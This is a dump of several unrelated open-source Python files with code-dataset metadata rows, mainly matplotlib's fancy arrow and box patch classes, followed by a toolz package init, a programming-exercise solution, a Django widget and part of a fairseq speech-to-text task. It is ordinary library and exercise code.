widthA=widthA, lengthA=0, angleA=angleA,
widthB=widthB, lengthB=0, angleB=angleB)
@_register_style(_style_list)
class Simple(_Base):
"""A simple arrow. Only works with a quadratic Bezier curve."""
def __init__(self, head_length=.5, head_width=.5, tail_width=.2):
"""
Parameters
----------
head_length : float, default: 0.5
Length of the arrow head.
head_width : float, default: 0.5
Width of the arrow head.
tail_width : float, default: 0.2
Width of the arrow tail.
"""
self.head_length, self.head_width, self.tail_width = \
head_length, head_width, tail_width
super().__init__()
def transmute(self, path, mutation_size, linewidth):
x0, y0, x1, y1, x2, y2 = self.ensure_quadratic_bezier(path)
# divide the path into a head and a tail
head_length = self.head_length * mutation_size
in_f = inside_circle(x2, y2, head_length)
arrow_path = [(x0, y0), (x1, y1), (x2, y2)]
try:
arrow_out, arrow_in = \
split_bezier_intersecting_with_closedpath(
arrow_path, in_f, tolerance=0.01)
except NonIntersectingPathException:
# if this happens, make a straight line of the head_length
# long.
x0, y0 = _point_along_a_line(x2, y2, x1, y1, head_length)
x1n, y1n = 0.5 * (x0 + x2), 0.5 * (y0 + y2)
arrow_in = [(x0, y0), (x1n, y1n), (x2, y2)]
arrow_out = None
# head
head_width = self.head_width * mutation_size
head_left, head_right = make_wedged_bezier2(arrow_in,
head_width / 2., wm=.5)
# tail
if arrow_out is not None:
tail_width = self.tail_width * mutation_size
tail_left, tail_right = get_parallels(arrow_out,
tail_width / 2.)
patch_path = [(Path.MOVETO, tail_right[0]),
(Path.CURVE3, tail_right[1]),
(Path.CURVE3, tail_right[2]),
(Path.LINETO, head_right[0]),
(Path.CURVE3, head_right[1]),
(Path.CURVE3, head_right[2]),
(Path.CURVE3, head_left[1]),
(Path.CURVE3, head_left[0]),
(Path.LINETO, tail_left[2]),
(Path.CURVE3, tail_left[1]),
(Path.CURVE3, tail_left[0]),
(Path.LINETO, tail_right[0]),
(Path.CLOSEPOLY, tail_right[0]),
]
else:
patch_path = [(Path.MOVETO, head_right[0]),
(Path.CURVE3, head_right[1]),
(Path.CURVE3, head_right[2]),
(Path.CURVE3, head_left[1]),
(Path.CURVE3, head_left[0]),
(Path.CLOSEPOLY, head_left[0]),
]
path = Path([p for c, p in patch_path], [c for c, p in patch_path])
return path, True
@_register_style(_style_list)
class Fancy(_Base):
"""A fancy arrow. Only works with a quadratic Bezier curve."""
def __init__(self, head_length=.4, head_width=.4, tail_width=.4):
"""
Parameters
----------
head_length : float, default: 0.4
Length of the arrow head.
head_width : float, default: 0.4
Width of the arrow head.
tail_width : float, default: 0.4
Width of the arrow tail.
"""
self.head_length, self.head_width, self.tail_width = \
head_length, head_width, tail_width
super().__init__()
def transmute(self, path, mutation_size, linewidth):
x0, y0, x1, y1, x2, y2 = self.ensure_quadratic_bezier(path)
# divide the path into a head and a tail
head_length = self.head_length * mutation_size
arrow_path = [(x0, y0), (x1, y1), (x2, y2)]
# path for head
in_f = inside_circle(x2, y2, head_length)
try:
path_out, path_in = split_bezier_intersecting_with_closedpath(
arrow_path, in_f, tolerance=0.01)
except NonIntersectingPathException:
# if this happens, make a straight line of the head_length
# long.
x0, y0 = _point_along_a_line(x2, y2, x1, y1, head_length)
x1n, y1n = 0.5 * (x0 + x2), 0.5 * (y0 + y2)
arrow_path = [(x0, y0), (x1n, y1n), (x2, y2)]
path_head = arrow_path
else:
path_head = path_in
# path for head
in_f = inside_circle(x2, y2, head_length * .8)
path_out, path_in = split_bezier_intersecting_with_closedpath(
arrow_path, in_f, tolerance=0.01)
path_tail = path_out
# head
head_width = self.head_width * mutation_size
head_l, head_r = make_wedged_bezier2(path_head,
head_width / 2.,
wm=.6)
# tail
tail_width = self.tail_width * mutation_size
tail_left, tail_right = make_wedged_bezier2(path_tail,
tail_width * .5,
w1=1., wm=0.6, w2=0.3)
# path for head
in_f = inside_circle(x0, y0, tail_width * .3)
path_in, path_out = split_bezier_intersecting_with_closedpath(
arrow_path, in_f, tolerance=0.01)
tail_start = path_in[-1]
head_right, head_left = head_r, head_l
patch_path = [(Path.MOVETO, tail_start),
(Path.LINETO, tail_right[0]),
(Path.CURVE3, tail_right[1]),
(Path.CURVE3, tail_right[2]),
(Path.LINETO, head_right[0]),
(Path.CURVE3, head_right[1]),
(Path.CURVE3, head_right[2]),
(Path.CURVE3, head_left[1]),
(Path.CURVE3, head_left[0]),
(Path.LINETO, tail_left[2]),
(Path.CURVE3, tail_left[1]),
(Path.CURVE3, tail_left[0]),
(Path.LINETO, tail_start),
(Path.CLOSEPOLY, tail_start),
]
path = Path([p for c, p in patch_path], [c for c, p in patch_path])
return path, True
@_register_style(_style_list)
class Wedge(_Base):
"""
Wedge(?) shape. Only works with a quadratic Bezier curve. The
begin point has a width of the tail_width and the end point has a
width of 0. At the middle, the width is shrink_factor*tail_width.
"""
def __init__(self, tail_width=.3, shrink_factor=0.5):
"""
Parameters
----------
tail_width : float, default: 0.3
Width of the tail.
shrink_factor : float, default: 0.5
Fraction of the arrow width at the middle point.
"""
self.tail_width = tail_width
self.shrink_factor = shrink_factor
super().__init__()
def transmute(self, path, mutation_size, linewidth):
x0, y0, x1, y1, x2, y2 = self.ensure_quadratic_bezier(path)
arrow_path = [(x0, y0), (x1, y1), (x2, y2)]
b_plus, b_minus = make_wedged_bezier2(
arrow_path,
self.tail_width * mutation_size / 2.,
wm=self.shrink_factor)
patch_path = [(Path.MOVETO, b_plus[0]),
(Path.CURVE3, b_plus[1]),
(Path.CURVE3, b_plus[2]),
(Path.LINETO, b_minus[2]),
(Path.CURVE3, b_minus[1]),
(Path.CURVE3, b_minus[0]),
(Path.CLOSEPOLY, b_minus[0]),
]
path = Path([p for c, p in patch_path], [c for c, p in patch_path])
return path, True
docstring.interpd.update(
AvailableBoxstyles=BoxStyle.pprint_styles(),
ListBoxstyles=_simpleprint_styles(BoxStyle._style_list),
AvailableArrowstyles=ArrowStyle.pprint_styles(),
AvailableConnectorstyles=ConnectionStyle.pprint_styles(),
)
docstring.dedent_interpd(BoxStyle)
docstring.dedent_interpd(ArrowStyle)
docstring.dedent_interpd(ConnectionStyle)
class FancyBboxPatch(Patch):
"""
A fancy box around a rectangle with lower left at *xy* = (*x*, *y*)
with specified width and height.
`.FancyBboxPatch` is similar to `.Rectangle`, but it draws a fancy box
around the rectangle. The transformation of the rectangle box to the
fancy box is delegated to the style classes defined in `.BoxStyle`.
"""
_edge_default = True
def __str__(self):
s = self.__class__.__name__ + "((%g, %g), width=%g, height=%g)"
return s % (self._x, self._y, self._width, self._height)
@docstring.dedent_interpd
def __init__(self, xy, width, height,
boxstyle="round",
bbox_transmuter=None,
mutation_scale=1.,
mutation_aspect=None,
**kwargs):
"""
Parameters
----------
xy : float, float
The lower left corner of the box.
width : float
The width of the box.
height : float
The height of the box.
boxstyle : str or `matplotlib.patches.BoxStyle`
The style of the fancy box. This can either be a `.BoxStyle`
instance or a string of the style name and optionally comma
seprarated attributes (e.g. "Round, pad=0.2"). This string is
passed to `.BoxStyle` to construct a `.BoxStyle` object. See
there for a full documentation.
The following box styles are available:
%(AvailableBoxstyles)s
mutation_scale : float, default: 1
Scaling factor applied to the attributes of the box style
(e.g. pad or rounding_size).
mutation_aspect : float, optional
The height of the rectangle will be squeezed by this value before
the mutation and the mutated box will be stretched by the inverse
of it. For example, this allows different horizontal and vertical
padding.
Other Parameters
----------------
**kwargs : `.Patch` properties
%(Patch)s
"""
Patch.__init__(self, **kwargs)
self._x = xy[0]
self._y = xy[1]
self._width = width
self._height = height
if boxstyle == "custom":
if bbox_transmuter is None:
raise ValueError("bbox_transmuter argument is needed with "
"custom boxstyle")
self._bbox_transmuter = bbox_transmuter
else:
self.set_boxstyle(boxstyle)
self._mutation_scale = mutation_scale
self._mutation_aspect = mutation_aspect
self.stale = True
@docstring.dedent_interpd
def set_boxstyle(self, boxstyle=None, **kwargs):
"""
Set the box style.
Most box styles can be further configured using attributes.
Attributes from the previous box style are not reused.
Without argument (or with ``boxstyle=None``), the available box styles
are returned as a human-readable string.
Parameters
----------
boxstyle : str
The name of the box style. Optionally, followed by a comma and a
comma-separated list of attributes. The attributes may
alternatively be passed separately as keyword arguments.
The following box styles are available:
%(AvailableBoxstyles)s
.. ACCEPTS: %(ListBoxstyles)s
**kwargs
Additional attributes for the box style. See the table above for
supported parameters.
Examples
--------
::
set_boxstyle("round,pad=0.2")
set_boxstyle("round", pad=0.2)
"""
if boxstyle is None:
return BoxStyle.pprint_styles()
if isinstance(boxstyle, BoxStyle._Base) or callable(boxstyle):
self._bbox_transmuter = boxstyle
else:
self._bbox_transmuter = BoxStyle(boxstyle, **kwargs)
self.stale = True
def set_mutation_scale(self, scale):
"""
Set the mutation scale.
Parameters
----------
scale : float
"""
self._mutation_scale = scale
self.stale = True
def get_mutation_scale(self):
"""Return the mutation scale."""
return self._mutation_scale
def set_mutation_aspect(self, aspect):
"""
Set the aspect ratio of the bbox mutation.
Parameters
----------
aspect : float
"""
self._mutation_aspect = aspect
self.stale = True
def get_mutation_aspect(self):
"""Return the aspect ratio of the bbox mutation."""
return self._mutation_aspect
def get_boxstyle(self):
"""Return the boxstyle object."""
return self._bbox_transmuter
def get_path(self):
"""Return the mutated path of the rectangle."""
_path = self.get_boxstyle()(self._x, self._y,
self._width, self._height,
self.get_mutation_scale(),
self.get_mutation_aspect())
return _path
# Following methods are borrowed from the Rectangle class.
def get_x(self):
"""Return the left coord of the rectangle."""
return self._x
def get_y(self):
"""Return the bottom coord of the rectangle."""
return self._y
def get_width(self):
"""Return the width of the rectangle."""
return self._width
def get_height(self):
"""Return the height of the rectangle."""
return self._height
def set_x(self, x):
"""
Set the left coord of the rectangle.
Parameters
----------
x : float
"""
self._x = x
self.stale = True
def set_y(self, y):
"""
Set the bottom coord of the rectangle.
Parameters
----------
y : float
"""
self._y = y
self.stale = True
def set_width(self, w):
"""
Set the rectangle width.
Parameters
----------
w : float
"""
self._width = w
self.stale = True
def set_height(self, h):
"""
Set the rectangle height.
Parameters
----------
h : float
"""
self._height = h
self.stale = True
def set_bounds(self, *args):
"""
Set the bounds of the rectangle.
Call signatures::
set_bounds(left, bottom, width, height)
set_bounds((left, bottom, width, height))
Parameters
----------
left, bottom : float
The coordinates of the bottom left corner of the rectangle.
width, height : float
The width/height of the rectangle.
"""
if len(args) == 1:
l, b, w, h = args[0]
else:
l, b, w, h = args
self._x = l
self._y = b
self._width = w
self._height = h
self.stale = True
def get_bbox(self):
"""Return the `.Bbox`."""
return transforms.Bbox.from_bounds(self._x, self._y,
self._width, self._height)
class FancyArrowPatch(Patch):
"""
A fancy arrow patch. It draws an arrow using the `ArrowStyle`.
The head and tail positions are fixed at the specified start and end points
of the arrow, but the size and shape (in display coordinates) of the arrow
does not change when the axis is moved or zoomed.
"""
_edge_default = True
def __str__(self):
if self._posA_posB is not None:
(x1, y1), (x2, y2) = self._posA_posB
return f"{type(self).__name__}(({x1:g}, {y1:g})->({x2:g}, {y2:g}))"
else:
return f"{type(self).__name__}({self._path_original})"
@docstring.dedent_interpd
def __init__(self, posA=None, posB=None,
path=None,
arrowstyle="simple",
connectionstyle="arc3",
patchA=None,
patchB=None,
shrinkA=2,
shrinkB=2,
mutation_scale=1,
mutation_aspect=None,
dpi_cor=1,
**kwargs):
"""
There are two ways for defining an arrow:
- If *posA* and *posB* are given, a path connecting two points is
created according to *connectionstyle*. The path will be
clipped with *patchA* and *patchB* and further shrunken by
*shrinkA* and *shrinkB*. An arrow is drawn along this
resulting path using the *arrowstyle* parameter.
- Alternatively if *path* is provided, an arrow is drawn along this
path and *patchA*, *patchB*, *shrinkA*, and *shrinkB* are ignored.
Parameters
----------
posA, posB : (float, float), default: None
(x, y) coordinates of arrow tail and arrow head respectively.
path : `~matplotlib.path.Path`, default: None
If provided, an arrow is drawn along this path and *patchA*,
*patchB*, *shrinkA*, and *shrinkB* are ignored.
arrowstyle : str or `.ArrowStyle`, default: 'simple'
The `.ArrowStyle` with which the fancy arrow is drawn. If a
string, it should be one of the available arrowstyle names, with
optional comma-separated attributes. The optional attributes are
meant to be scaled with the *mutation_scale*. The following arrow
styles are available:
%(AvailableArrowstyles)s
connectionstyle : str or `.ConnectionStyle` or None, optional, \
default: 'arc3'
The `.ConnectionStyle` with which *posA* and *posB* are connected.
If a string, it should be one of the available connectionstyle
names, with optional comma-separated attributes. The following
connection styles are available:
%(AvailableConnectorstyles)s
patchA, patchB : `.Patch`, default: None
Head and tail patches, respectively.
shrinkA, shrinkB : float, default: 2
Shrinking factor of the tail and head of the arrow respectively.
mutation_scale : float, default: 1
Value with which attributes of *arrowstyle* (e.g., *head_length*)
will be scaled.
mutation_aspect : None or float, default: None
The height of the rectangle will be squeezed by this value before
the mutation and the mutated box will be stretched by the inverse
of it.
dpi_cor : float, default: 1
dpi_cor is currently used for linewidth-related things and shrink
factor. Mutation scale is affected by this.
Other Parameters
----------------
**kwargs : `.Patch` properties, optional
Here is a list of available `.Patch` properties:
%(Patch)s
In contrast to other patches, the default ``capstyle`` and
``joinstyle`` for `FancyArrowPatch` are set to ``"round"``.
"""
# Traditionally, the cap- and joinstyle for FancyArrowPatch are round
kwargs.setdefault("joinstyle", "round")
kwargs.setdefault("capstyle", "round")
Patch.__init__(self, **kwargs)
if posA is not None and posB is not None and path is None:
self._posA_posB = [posA, posB]
if connectionstyle is None:
connectionstyle = "arc3"
self.set_connectionstyle(connectionstyle)
elif posA is None and posB is None and path is not None:
self._posA_posB = None
else:
raise ValueError("Either posA and posB, or path need to provided")
self.patchA = patchA
self.patchB = patchB
self.shrinkA = shrinkA
self.shrinkB = shrinkB
self._path_original = path
self.set_arrowstyle(arrowstyle)
self._mutation_scale = mutation_scale
self._mutation_aspect = mutation_aspect
self.set_dpi_cor(dpi_cor)
def set_dpi_cor(self, dpi_cor):
"""
dpi_cor is currently used for linewidth-related things and
shrink factor. Mutation scale is affected by this.
Parameters
----------
dpi_cor : float
"""
self._dpi_cor = dpi_cor
self.stale = True
def get_dpi_cor(self):
"""
dpi_cor is currently used for linewidth-related things and
shrink factor. Mutation scale is affected by this.
Returns
-------
scalar
"""
return self._dpi_cor
def set_positions(self, posA, posB):
"""
Set the begin and end positions of the connecting path.
Parameters
----------
posA, posB : None, tuple
(x, y) coordinates of arrow tail and arrow head respectively. If
`None` use current value.
"""
if posA is not None:
self._posA_posB[0] = posA
if posB is not None:
self._posA_posB[1] = posB
self.stale = True
def set_patchA(self, patchA):
"""
Set the tail patch.
Parameters
----------
patchA : `.patches.Patch`
"""
self.patchA = patchA
self.stale = True
def set_patchB(self, patchB):
"""
Set the head patch.
Parameters
----------
patchB : `.patches.Patch`
"""
self.patchB = patchB
self.stale = True
def set_connectionstyle(self, connectionstyle, **kw):
"""
Set the connection style. Old attributes are forgotten.
Parameters
----------
connectionstyle : str or `.ConnectionStyle` or None, optional
Can be a string with connectionstyle name with
optional comma-separated attributes, e.g.::
set_connectionstyle("arc,angleA=0,armA=30,rad=10")
Alternatively, the attributes can be provided as keywords, e.g.::
set_connectionstyle("arc", angleA=0,armA=30,rad=10)
Without any arguments (or with ``connectionstyle=None``), return
available styles as a list of strings.
"""
if connectionstyle is None:
return ConnectionStyle.pprint_styles()
if (isinstance(connectionstyle, ConnectionStyle._Base) or
callable(connectionstyle)):
self._connector = connectionstyle
else:
self._connector = ConnectionStyle(connectionstyle, **kw)
self.stale = True
def get_connectionstyle(self):
"""Return the `ConnectionStyle` used."""
return self._connector
def set_arrowstyle(self, arrowstyle=None, **kw):
"""
Set the arrow style. Old attributes are forgotten. Without arguments
(or with ``arrowstyle=None``) returns available box styles as a list of
strings.
Parameters
----------
arrowstyle : None or ArrowStyle or str, default: None
Can be a string with arrowstyle name with optional comma-separated
attributes, e.g.::
set_arrowstyle("Fancy,head_length=0.2")
Alternatively attributes can be provided as keywords, e.g.::
set_arrowstyle("fancy", head_length=0.2)
"""
if arrowstyle is None:
return ArrowStyle.pprint_styles()
if isinstance(arrowstyle, ArrowStyle._Base):
self._arrow_transmuter = arrowstyle
else:
self._arrow_transmuter = ArrowStyle(arrowstyle, **kw)
self.stale = True
def get_arrowstyle(self):
"""Return the arrowstyle object."""
return self._arrow_transmuter
def set_mutation_scale(self, scale):
"""
Set the mutation scale.
Parameters
----------
scale : float
"""
self._mutation_scale = scale
self.stale = True
def get_mutation_scale(self):
"""
Return the mutation scale.
Returns
-------
scalar
"""
return self._mutation_scale
def set_mutation_aspect(self, aspect):
"""
Set the aspect ratio of the bbox mutation.
Parameters
----------
aspect : float
"""
self._mutation_aspect = aspect
self.stale = True
def get_mutation_aspect(self):
"""Return the aspect ratio of the bbox mutation."""
return self._mutation_aspect
def get_path(self):
"""
Return the path of the arrow in the data coordinates. Use
get_path_in_displaycoord() method to retrieve the arrow path
in display coordinates.
"""
_path, fillable = self.get_path_in_displaycoord()
if np.iterable(fillable):
_path = Path.make_compound_path(*_path)
return self.get_transform().inverted().transform_path(_path)
def get_path_in_displaycoord(self):
"""Return the mutated path of the arrow in display coordinates."""
dpi_cor = self.get_dpi_cor()
if self._posA_posB is not None:
posA = self._convert_xy_units(self._posA_posB[0])
posB = self._convert_xy_units(self._posA_posB[1])
(posA, posB) = self.get_transform().transform((posA, posB))
_path = self.get_connectionstyle()(posA, posB,
patchA=self.patchA,
patchB=self.patchB,
shrinkA=self.shrinkA * dpi_cor,
shrinkB=self.shrinkB * dpi_cor
)
else:
_path = self.get_transform().transform_path(self._path_original)
_path, fillable = self.get_arrowstyle()(
_path,
self.get_mutation_scale() * dpi_cor,
self.get_linewidth() * dpi_cor,
self.get_mutation_aspect())
# if not fillable:
# self._fill = False
return _path, fillable
def draw(self, renderer):
if not self.get_visible():
return
with self._bind_draw_path_function(renderer) as draw_path:
# FIXME : dpi_cor is for the dpi-dependency of the linewidth. There
# could be room for improvement.
self.set_dpi_cor(renderer.points_to_pixels(1.))
path, fillable = self.get_path_in_displaycoord()
if not np.iterable(fillable):
path = [path]
fillable = [fillable]
affine = transforms.IdentityTransform()
for p, f in zip(path, fillable):
draw_path(
p, affine,
self._facecolor if f and self._facecolor[3] else None)
class ConnectionPatch(FancyArrowPatch):
"""A patch that connects two points (possibly in different axes)."""
def __str__(self):
return "ConnectionPatch((%g, %g), (%g, %g))" % \
(self.xy1[0], self.xy1[1], self.xy2[0], self.xy2[1])
@docstring.dedent_interpd
def __init__(self, xyA, xyB, coordsA, coordsB=None,
axesA=None, axesB=None,
arrowstyle="-",
connectionstyle="arc3",
patchA=None,
patchB=None,
shrinkA=0.,
shrinkB=0.,
mutation_scale=10.,
mutation_aspect=None,
clip_on=False,
dpi_cor=1.,
**kwargs):
"""
Connect point *xyA* in *coordsA* with point *xyB* in *coordsB*.
Valid keys are
=============== ======================================================
Key Description
=============== ======================================================
arrowstyle the arrow style
connectionstyle the connection style
relpos default is (0.5, 0.5)
patchA default is bounding box of the text
patchB default is None
shrinkA default is 2 points
shrinkB default is 2 points
mutation_scale default is text size (in points)
mutation_aspect default is 1.
? any key for `matplotlib.patches.PathPatch`
=============== ======================================================
*coordsA* and *coordsB* are strings that indicate the
coordinates of *xyA* and *xyB*.
================= ===================================================
Property Description
================= ===================================================
'figure points' points from the lower left corner of the figure
'figure pixels' pixels from the lower left corner of the figure
'figure fraction' 0, 0 is lower left of figure and 1, 1 is upper right
'axes points' points from lower left corner of axes
'axes pixels' pixels from lower left corner of axes
'axes fraction' 0, 0 is lower left of axes and 1, 1 is upper right
'data' use the coordinate system of the object being
annotated (default)
'offset points' offset (in points) from the *xy* value
'polar' you can specify *theta*, *r* for the annotation,
even in cartesian plots. Note that if you are using
a polar axes, you do not need to specify polar for
the coordinate system since that is the native
"data" coordinate system.
================= ===================================================
Alternatively they can be set to any valid
`~matplotlib.transforms.Transform`.
.. note::
Using `ConnectionPatch` across two `~.axes.Axes` instances
is not directly compatible with :doc:`constrained layout
</tutorials/intermediate/constrainedlayout_guide>`. Add the artist
directly to the `.Figure` instead of adding it to a specific Axes.
.. code-block:: default
fig, ax = plt.subplots(1, 2, constrained_layout=True)
con = ConnectionPatch(..., axesA=ax[0], axesB=ax[1])
fig.add_artist(con)
"""
if coordsB is None:
coordsB = coordsA
# we'll draw ourself after the artist we annotate by default
self.xy1 = xyA
self.xy2 = xyB
self.coords1 = coordsA
self.coords2 = coordsB
self.axesA = axesA
self.axesB = axesB
FancyArrowPatch.__init__(self,
posA=(0, 0), posB=(1, 1),
arrowstyle=arrowstyle,
connectionstyle=connectionstyle,
patchA=patchA,
patchB=patchB,
shrinkA=shrinkA,
shrinkB=shrinkB,
mutation_scale=mutation_scale,
mutation_aspect=mutation_aspect,
clip_on=clip_on,
dpi_cor=dpi_cor,
**kwargs)
# if True, draw annotation only if self.xy is inside the axes
self._annotation_clip = None
def _get_xy(self, xy, s, axes=None):
"""Calculate the pixel position of given point."""
s0 = s # For the error message, if needed.
if axes is None:
axes = self.axes
xy = np.array(xy)
if s in ["figure points", "axes points"]:
xy *= self.figure.dpi / 72
s = s.replace("points", "pixels")
elif s == "figure fraction":
s = self.figure.transFigure
elif s == "axes fraction":
s = axes.transAxes
x, y = xy
if s == 'data':
trans = axes.transData
x = float(self.convert_xunits(x))
y = float(self.convert_yunits(y))
return trans.transform((x, y))
elif s == 'offset points':
if self.xycoords == 'offset points': # prevent recursion
return self._get_xy(self.xy, 'data')
return (
self._get_xy(self.xy, self.xycoords) # converted data point
+ xy * self.figure.dpi / 72) # converted offset
elif s == 'polar':
theta, r = x, y
x = r * np.cos(theta)
y = r * np.sin(theta)
trans = axes.transData
return trans.transform((x, y))
elif s == 'figure pixels':
# pixels from the lower left corner of the figure
bb = self.figure.bbox
x = bb.x0 + x if x >= 0 else bb.x1 + x
y = bb.y0 + y if y >= 0 else bb.y1 + y
return x, y
elif s == 'axes pixels':
# pixels from the lower left corner of the axes
bb = axes.bbox
x = bb.x0 + x if x >= 0 else bb.x1 + x
y = bb.y0 + y if y >= 0 else bb.y1 + y
return x, y
elif isinstance(s, transforms.Transform):
return s.transform(xy)
else:
raise ValueError(f"{s0} is not a valid coordinate transformation")
def set_annotation_clip(self, b):
"""
Set the clipping behavior.
Parameters
----------
b : bool or None
- *False*: The annotation will always be drawn regardless of its
position.
- *True*: The annotation will only be drawn if ``self.xy`` is
inside the axes.
- *None*: The annotation will only be drawn if ``self.xy`` is
inside the axes and ``self.xycoords == "data"``.
"""
self._annotation_clip = b
self.stale = True
def get_annotation_clip(self):
"""
Return the clipping behavior.
See `.set_annotation_clip` for the meaning of the return value.
"""
return self._annotation_clip
def get_path_in_displaycoord(self):
"""Return the mutated path of the arrow in display coordinates."""
dpi_cor = self.get_dpi_cor()
posA = self._get_xy(self.xy1, self.coords1, self.axesA)
posB = self._get_xy(self.xy2, self.coords2, self.axesB)
path = self.get_connectionstyle()(
posA, posB,
patchA=self.patchA, patchB=self.patchB,
shrinkA=self.shrinkA * dpi_cor, shrinkB=self.shrinkB * dpi_cor,
)
path, fillable = self.get_arrowstyle()(
path,
self.get_mutation_scale() * dpi_cor,
self.get_linewidth() * dpi_cor,
self.get_mutation_aspect()
)
return path, fillable
def _check_xy(self, renderer):
"""Check whether the annotation needs to be drawn."""
b = self.get_annotation_clip()
if b or (b is None and self.coords1 == "data"):
xy_pixel = self._get_xy(self.xy1, self.coords1, self.axesA)
if self.axesA is None:
axes = self.axes
else:
axes = self.axesA
if not axes.contains_point(xy_pixel):
return False
if b or (b is None and self.coords2 == "data"):
xy_pixel = self._get_xy(self.xy2, self.coords2, self.axesB)
if self.axesB is None:
axes = self.axes
else:
axes = self.axesB
if not axes.contains_point(xy_pixel):
return False
return True
def draw(self, renderer):
if renderer is not None:
self._renderer = renderer
if not self.get_visible() or not self._check_xy(renderer):
return
FancyArrowPatch.draw(self, renderer)
| [
"[email protected]"
]
| |
1522254803b17907540e7f62b7738bd022e97f1f | ce083128fa87ca86c65059893aa8882d088461f5 | /python/sistema-de-contatos/.venv/lib/python2.7/site-packages/toolz/__init__.py | 43226df7316aa0545101101540d51ff04f94c368 | []
| no_license | marcosptf/fedora | 581a446e7f81d8ae9a260eafb92814bc486ee077 | 359db63ff1fa79696b7bc803bcfa0042bff8ab44 | refs/heads/master | 2023-04-06T14:53:40.378260 | 2023-03-26T00:47:52 | 2023-03-26T00:47:52 | 26,059,824 | 6 | 5 | null | 2022-12-08T00:43:21 | 2014-11-01T18:48:56 | null | UTF-8 | Python | false | false | 314 | py | from .itertoolz import *
from .functoolz import *
from .dicttoolz import *
from .recipes import *
from .compatibility import map, filter
from . import sandbox
from functools import partial, reduce
sorted = sorted
# Aliases
comp = compose
functoolz._sigs.create_signature_registry()
__version__ = '0.8.0'
| [
"[email protected]"
]
| |
c259f5026a586e6ea50ad764940a3a142ae65202 | c7f4387733c95ced53dae485f36618a88f18ea45 | /Uri/1061.py | 3e14cd823da4b724d092a9f5fbb6458bae7fd7b6 | []
| no_license | douradodev/Uri | 25d7636b5d5553fafdbd61a38d7c465c4cb79c0c | e879ebca7a87de674d69d739617c4207156ce349 | refs/heads/main | 2023-06-03T18:53:11.749866 | 2021-06-22T12:40:11 | 2021-06-22T12:40:11 | 379,264,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,080 | py | def main():
begin_day = input().split()
begin_time= input().split(' : ')
end_day = input().split()
end_time= input().split(' : ')
begin_time = int(begin_time[0]), int(begin_time[1]), int(begin_time[2])
end_time = int(end_time[0]), int(end_time[1]), int(end_time[2])
total_day = 0
total_time = [0,0,0]
total_day = int(end_day[1]) - int(begin_day[1])
if end_time[2] - begin_time[2] < 0:
total_time[2] = end_time[2] + 60 - begin_time[2]
dif_time = 1
else:
total_time[2] = end_time[2] - begin_time[2]
dif_time = 0
if (end_time[1] - dif_time) - begin_time[1] < 0:
total_time[1] = (end_time[1] - dif_time + 60) - begin_time[1]
dif_time = 1
else:
total_time[1] = (end_time[1] - dif_time) - begin_time[1]
dif_time = 0
if (end_time[0] - dif_time) - begin_time[0] < 0:
total_time[0] = (end_time[0] - dif_time + 24) - begin_time[0]
total_day -= 1
else:
total_time[0] = (end_time[0] - dif_time) - begin_time[0]
print('{} dia(s)\n{} hora(s)\n{} minuto(s)\n{} segundo(s)'.format(total_day, total_time[0], total_time[1], total_time[2]))
main() | [
"[email protected]"
]
| |
aa29aa9dd6c0b5f6833afd90f618c86c2bebc4b7 | 0386591b51fdbf5759faef6afb8729b64a3f1589 | /layerserver/widgets/creationuser.py | 0d14842f70435682d0eb6129fb35fbba132c0939 | [
"BSD-3-Clause"
]
| permissive | giscube/giscube-admin | 1e155402e094eb4db1f7ca260a8d1402e27a31df | 4ce285a6301f59a8e48ecf78d58ef83c3827b5e0 | refs/heads/main | 2023-07-11T17:23:56.531443 | 2023-02-06T15:12:31 | 2023-02-06T15:12:31 | 94,087,469 | 7 | 1 | BSD-3-Clause | 2023-07-07T13:22:09 | 2017-06-12T11:12:56 | Python | UTF-8 | Python | false | false | 371 | py | from .base import BaseWidget
class CreationUserWidget(BaseWidget):
base_type = 'string'
@staticmethod
def create(request, validated_data, widget):
validated_data[widget['name']] = request.user.username
@staticmethod
def is_valid(cleaned_data):
if not cleaned_data['readonly']:
return BaseWidget.ERROR_READONLY_REQUIRED
| [
"[email protected]"
]
| |
757ad5797b4182e0b1dc39f8fd424e66c7e6df6b | 23307f8e889f232724756bb26b1def1f0ba3323b | /fairseq/tasks/speech_to_text.py | 9388047a5e92e1c66236022de664b0480b9862be | []
| no_license | krisjeong/fairseq_data | 9395cb574d91147c95b6f08eecd814e4cb2fdad8 | f29e7dae3c2be3a908e795bfc952cc845b80280d | refs/heads/master | 2023-07-12T22:21:22.349970 | 2021-08-18T06:20:11 | 2021-08-18T06:20:11 | 397,152,122 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,214 | py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import os.path as op
from argparse import Namespace
from fairseq.data import Dictionary, encoders
from fairseq.data.audio.speech_to_text_dataset import (
S2TDataConfig,
SpeechToTextDataset,
SpeechToTextDatasetCreator,
)
from fairseq.tasks import FairseqTask, register_task
logging.basicConfig(
format="%(asctime)s | %(levelname)s | %(name)s | %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.INFO,
)
logger = logging.getLogger(__name__)
@register_task("speech_to_text")
class SpeechToTextTask(FairseqTask):
@staticmethod
def add_args(parser):
parser.add_argument("data", help="manifest root path")
parser.add_argument(
"--config-yaml",
type=str,
default="config.yaml",
help="Configuration YAML filename (under manifest root)",
)
parser.add_argument(
"--max-source-positions",
default=6000,
type=int,
metavar="N",
help="max number of tokens in the source sequence",
)
parser.add_argument(
"--max-target-positions",
default=1024,
type=int,
metavar="N",
help="max number of tokens in the target sequence",
)
def __init__(self, args, tgt_dict):
super().__init__(args)
self.tgt_dict = tgt_dict
self.data_cfg = S2TDataConfig(op.join(args.data, args.config_yaml))
@classmethod
def setup_task(cls, args, **kwargs):
data_cfg = S2TDataConfig(op.join(args.data, args.config_yaml))
dict_path = op.join(args.data, data_cfg.vocab_filename)
if not op.isfile(dict_path):
raise FileNotFoundError(f"Dict not found: {dict_path}")
tgt_dict = Dictionary.load(dict_path)
logger.info(
f"dictionary size ({data_cfg.vocab_filename}): " f"{len(tgt_dict):,}"
)
if getattr(args, "train_subset", None) is not None:
if not all(s.startswith("train") for s in args.train_subset.split(",")):
raise ValueError('Train splits should be named like "train*".')
return cls(args, tgt_dict)
def build_criterion(self, args):
from fairseq import criterions
if self.data_cfg.prepend_tgt_lang_tag and args.ignore_prefix_size != 1:
raise ValueError(
'Please set "--ignore-prefix-size 1" since '
"target language ID token is prepended as BOS."
)
return criterions.build_criterion(args, self)
